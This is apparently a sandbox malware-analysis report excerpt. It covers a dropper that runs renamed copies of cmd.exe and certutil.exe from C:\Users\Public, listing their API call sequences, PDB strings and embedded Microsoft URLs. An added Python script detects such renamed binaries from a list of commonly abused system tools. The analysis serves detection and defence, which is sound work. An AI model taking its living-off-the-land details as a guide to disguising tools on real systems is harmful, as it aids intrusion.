Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000007.00000000.1998811698.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.2001223105.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.2005831412.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.2006855083.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr
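The four "Binary string" hits above are the report's evidence that the two dropped files are renamed system binaries: the PE debug record of C:\Users\Public\alpha.exe names cmd.pdb and that of C:\Users\Public\kn.exe names certutil.pdb. The following script is an added example (not code from this report, from Joe Sandbox or from the sample) that automates the same check on disk: it extracts the PDB file name from the CodeView RSDS record of a PE image and flags the file when it is running under a different name. It assumes a hand-built byte string standing in for the PE image and a short, illustrative list of system-binary PDB names; both are labelled in the code.

```python
"""Added example, not part of the Joe Sandbox report or of the analysed sample.

A renamed copy of a Windows system binary still carries its original PDB file
name in the PE CodeView (RSDS) debug record, which is exactly the evidence in
the report: cmd.pdb inside alpha.exe and certutil.pdb inside kn.exe. This
script pulls that name out of a PE image and flags the file when it is
running under a different name.
"""
import ntpath
import sys
from typing import Optional, Tuple

# CodeView PDB 7.0 record layout: b"RSDS" | 16-byte GUID | 4-byte age | NUL-terminated path
RSDS_SIGNATURE = b"RSDS"
RSDS_HEADER_LEN = 4 + 16 + 4

# PDB names of commonly abused system binaries and the file name each normally
# runs under. Assumption: a short illustrative list, not an exhaustive catalogue.
KNOWN_PDBS = {
    "cmd.pdb": "cmd.exe",
    "certutil.pdb": "certutil.exe",
    "powershell.pdb": "powershell.exe",
    "rundll32.pdb": "rundll32.exe",
    "mshta.pdb": "mshta.exe",
}


def extract_pdb_path(image: bytes) -> Optional[str]:
    """Return the PDB path from the first well-formed RSDS record, or None."""
    pos = image.find(RSDS_SIGNATURE)
    while pos != -1:
        start = pos + RSDS_HEADER_LEN
        end = image.find(b"\x00", start)
        if end > start:
            path = image[start:end]
            # Real PDB paths are printable ASCII; reject random byte runs that
            # happen to follow an "RSDS" substring elsewhere in the file
            if all(0x20 <= b < 0x7F for b in path):
                return path.decode("ascii")
        pos = image.find(RSDS_SIGNATURE, pos + 1)
    return None


def pdb_basename(pdb_path: str) -> str:
    """Lower-cased basename of a PDB path; the linker writes Windows separators."""
    return pdb_path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def check_renamed(image_path: str, image: bytes) -> Optional[Tuple[str, str]]:
    """Return (pdb_name, expected_exe_name) when the on-disk name does not match
    the system binary the PDB record belongs to; None when nothing is suspicious."""
    pdb_path = extract_pdb_path(image)
    if pdb_path is None:
        return None
    pdb_name = pdb_basename(pdb_path)
    expected = KNOWN_PDBS.get(pdb_name)
    if expected is None:
        return None
    # ntpath handles both "C:\Users\Public\kn.exe" and POSIX-style paths
    if ntpath.basename(image_path).lower() == expected:
        return None
    return pdb_name, expected


def scan_file(path: str) -> Optional[Tuple[str, str]]:
    """Read a file from disk and apply check_renamed to it."""
    with open(path, "rb") as fh:
        return check_renamed(path, fh.read())


# Constructed sample: a stand-in for a PE image whose RSDS record names
# certutil.pdb. The GUID and age bytes are dummies; a real file is parsed the
# same way because only the signature and the NUL-terminated path matter here.
SAMPLE_IMAGE = (
    b"MZ" + b"\x00" * 62
    + RSDS_SIGNATURE + b"\x11" * 16 + b"\x01\x00\x00\x00"
    + b"certutil.pdb\x00"
    + b"\x00" * 32
)

if __name__ == "__main__":
    if sys.argv[1:]:
        for path in sys.argv[1:]:
            hit = scan_file(path)
            if hit:
                print(f"{path}: renamed {hit[1]} (PDB {hit[0]})")
    else:
        hit = check_renamed(r"C:\Users\Public\kn.exe", SAMPLE_IMAGE)
        print(f"sample: renamed {hit[1]} (PDB {hit[0]})" if hit else "sample: clean")
```

Run it with one or more file paths to scan real binaries (python renamed_lolbin.py C:\Users\Public\*.exe), or with no arguments to exercise the constructed sample. The PDB name is a cheap triage signal, not a proof: a dropper can strip the debug directory or patch the string, so in production pair it with the OriginalFilename field of the VERSIONINFO resource and the Authenticode signature, which an attacker cannot alter without breaking the signature. Note also that the ctldl.windowsupdate.com, enterpriseregistration.windows.net and login.microsoftonline.com strings listed further down are carried by every legitimate copy of certutil.exe and are not indicators of the dropper's own infrastructure.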
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF6EB18823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,4_2_00007FF6EB18823C
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF6EB182978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,4_2_00007FF6EB182978
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF6EB197B4C FindFirstFileW,FindNextFileW,FindClose,4_2_00007FF6EB197B4C
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF6EB171560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,4_2_00007FF6EB171560
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF6EB1735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,4_2_00007FF6EB1735B8
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF6EB18823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,6_2_00007FF6EB18823C
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF6EB182978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,6_2_00007FF6EB182978
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF6EB197B4C FindFirstFileW,FindNextFileW,FindClose,6_2_00007FF6EB197B4C
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF6EB171560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,6_2_00007FF6EB171560
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF6EB1735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,6_2_00007FF6EB1735B8
Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF7FD815E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,7_2_00007FF7FD815E58
Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF7FD871B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,7_2_00007FF7FD871B04
Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF7FD8719F8 #359,FindFirstFileW,FindNextFileW,FindClose,7_2_00007FF7FD8719F8
Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF7FD81DBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,7_2_00007FF7FD81DBC0
Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF7FD853674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,7_2_00007FF7FD853674
Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF7FD81D4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,7_2_00007FF7FD81D4A4
Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF7FD7DD440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF7FD7DD440
Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF7FD81B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,7_2_00007FF7FD81B3D8
Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF7FD8710C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,7_2_00007FF7FD8710C4
Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF7FD873100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,7_2_00007FF7FD873100
Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF7FD876F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,7_2_00007FF7FD876F80
Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF7FD80C6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,7_2_00007FF7FD80C6F8
Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF7FD87234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,7_2_00007FF7FD87234C
Source: C:\Users\Public\alpha.exe Code function: 10_2_00007FF6EB18823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,10_2_00007FF6EB18823C
Source: C:\Users\Public\alpha.exe Code function: 10_2_00007FF6EB182978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,10_2_00007FF6EB182978
Source: C:\Users\Public\alpha.exe Code function: 10_2_00007FF6EB197B4C FindFirstFileW,FindNextFileW,FindClose,10_2_00007FF6EB197B4C
Source: C:\Users\Public\alpha.exe Code function: 10_2_00007FF6EB171560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,10_2_00007FF6EB171560
Source: C:\Users\Public\alpha.exe Code function: 10_2_00007FF6EB1735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,10_2_00007FF6EB1735B8
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF6EB18823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,11_2_00007FF6EB18823C
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF6EB182978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,11_2_00007FF6EB182978
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF6EB197B4C FindFirstFileW,FindNextFileW,FindClose,11_2_00007FF6EB197B4C
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF6EB171560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,11_2_00007FF6EB171560
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF6EB1735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,11_2_00007FF6EB1735B8
Source: kn.exe String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: kn.exe, 00000007.00000000.1998811698.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.2001223105.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.2005831412.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.2006855083.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enDisallowedCertLastSyncTimePinR
Source: kn.exe String found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%ws
Source: kn.exe, 00000007.00000000.1998811698.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.2001223105.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.2005831412.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.2006855083.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr String found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP
Source: kn.exe String found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc
Source: kn.exe String found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/device/
Source: kn.exe String found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/key/
Source: kn.exe String found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorize
Source: kn.exe, 00000007.00000000.1998811698.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.2001223105.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.2005831412.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.2006855083.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr String found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah
Source: kn.exe String found in binary or memory: https://login.microsoftonline.com/%s/oauth2/token

E-Banking Fraud

Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF7FD8460BC CertCreateCertificateContext,GetLastError,#357,CertAddCertificateContextToStore,GetLastError,#357,CertCompareCertificateName,CertOpenStore,GetLastError,CertAddCertificateContextToStore,GetLastError,CertFreeCertificateContext,CertCloseStore,7_2_00007FF7FD8460BC
Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF7FD7BF9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,7_2_00007FF7FD7BF9B8
Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF7FD7CFC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,7_2_00007FF7FD7CFC20
Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF7FD8698B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,7_2_00007FF7FD8698B0
Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF7FD82184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,7_2_00007FF7FD82184C
Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF7FD83342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF7FD83342C
Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF7FD8693A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,7_2_00007FF7FD8693A0
Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF7FD866EA8 NCryptImportKey,#360,7_2_00007FF7FD866EA8
Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF7FD830EF4 NCryptImportKey,#205,#359,#359,#357,7_2_00007FF7FD830EF4
Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF7FD820F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,7_2_00007FF7FD820F58
Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF7FD81EA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,7_2_00007FF7FD81EA7C
Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF7FD7F29A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,7_2_00007FF7FD7F29A0
Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF7FD7F25E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,7_2_00007FF7FD7F25E8
Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF7FD86A740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,7_2_00007FF7FD86A740
Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF7FD82E1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,7_2_00007FF7FD82E1F8
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF6EB19BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,4_2_00007FF6EB19BCF0
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF6EB1888C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,4_2_00007FF6EB1888C0
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF6EB188114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,4_2_00007FF6EB188114
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF6EB187FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,4_2_00007FF6EB187FF8
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF6EB1A1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,4_2_00007FF6EB1A1538
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF6EB173D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,4_2_00007FF6EB173D94
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF6EB18898C NtQueryInformationToken,4_2_00007FF6EB18898C
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF6EB1889E4 NtQueryInformationToken,NtQueryInformationToken,4_2_00007FF6EB1889E4
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF6EB19BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,6_2_00007FF6EB19BCF0
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF6EB1888C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,6_2_00007FF6EB1888C0
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF6EB188114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,6_2_00007FF6EB188114
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF6EB187FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,6_2_00007FF6EB187FF8
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF6EB1A1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,6_2_00007FF6EB1A1538
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF6EB173D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,6_2_00007FF6EB173D94
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF6EB18898C NtQueryInformationToken,6_2_00007FF6EB18898C
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF6EB1889E4 NtQueryInformationToken,NtQueryInformationToken,6_2_00007FF6EB1889E4
Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF7FD88C964 NtQuerySystemTime,RtlTimeToSecondsSince1970,7_2_00007FF7FD88C964
Source: C:\Users\Public\alpha.exe Code function: 10_2_00007FF6EB188114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,10_2_00007FF6EB188114
Source: C:\Users\Public\alpha.exe Code function: 10_2_00007FF6EB187FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,FindCloseChangeNotification,NtSetInformationFile,DeleteFileW,GetLastError,10_2_00007FF6EB187FF8
Source: C:\Users\Public\alpha.exe Code function: 10_2_00007FF6EB19BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,10_2_00007FF6EB19BCF0
Source: C:\Users\Public\alpha.exe Code function: 10_2_00007FF6EB1888C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,10_2_00007FF6EB1888C0
Source: C:\Users\Public\alpha.exe Code function: 10_2_00007FF6EB1A1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,10_2_00007FF6EB1A1538
Source: C:\Users\Public\alpha.exe Code function: 10_2_00007FF6EB173D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,10_2_00007FF6EB173D94
Source: C:\Users\Public\alpha.exe Code function: 10_2_00007FF6EB18898C NtQueryInformationToken,10_2_00007FF6EB18898C
Source: C:\Users\Public\alpha.exe Code function: 10_2_00007FF6EB1889E4 NtQueryInformationToken,NtQueryInformationToken,10_2_00007FF6EB1889E4
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF6EB188114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,11_2_00007FF6EB188114
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF6EB187FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,FindCloseChangeNotification,NtSetInformationFile,DeleteFileW,GetLastError,11_2_00007FF6EB187FF8
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB19BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,11_2_00007FF6EB19BCF0
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB1888C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,11_2_00007FF6EB1888C0
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB1A1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,11_2_00007FF6EB1A1538
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB173D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,11_2_00007FF6EB173D94
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB18898C NtQueryInformationToken,11_2_00007FF6EB18898C
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB1889E4 NtQueryInformationToken,NtQueryInformationToken,11_2_00007FF6EB1889E4
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB175240 | memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPEAX@Z,memset,CreateFileW,DeviceIoControl,memmove,CloseHandle,??_V@YAXPEAX@Z,memset,FindClose,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB184224 | InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,wcsrchr,lstrcmpW,SetConsoleMode,CreateProcessW,CloseHandle,CreateProcessAsUserW,_local_unwind,GetLastError,_local_unwind,_local_unwind,CloseHandle,DeleteProcThreadAttributeList,GetLastError,GetLastError,DeleteProcThreadAttributeList
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB1837D8
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB180A6C
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB17AA54
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB185554
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB184224
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB172C48
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB187854
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB19AC4C
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB171884
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB17B0D8
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB1818D4
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB177D30
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB178510
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB175B70
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB179B50
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB173F90
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB176BE0
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB19AFBC
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB173410
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB175240
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB177650
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB17D250
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB179E50
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB17E680
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB19EE88
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB176EE4
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB17372C
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB197F00
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB1A1538
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB19D9D0
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB1781D4
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB172220
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6EB19AA30
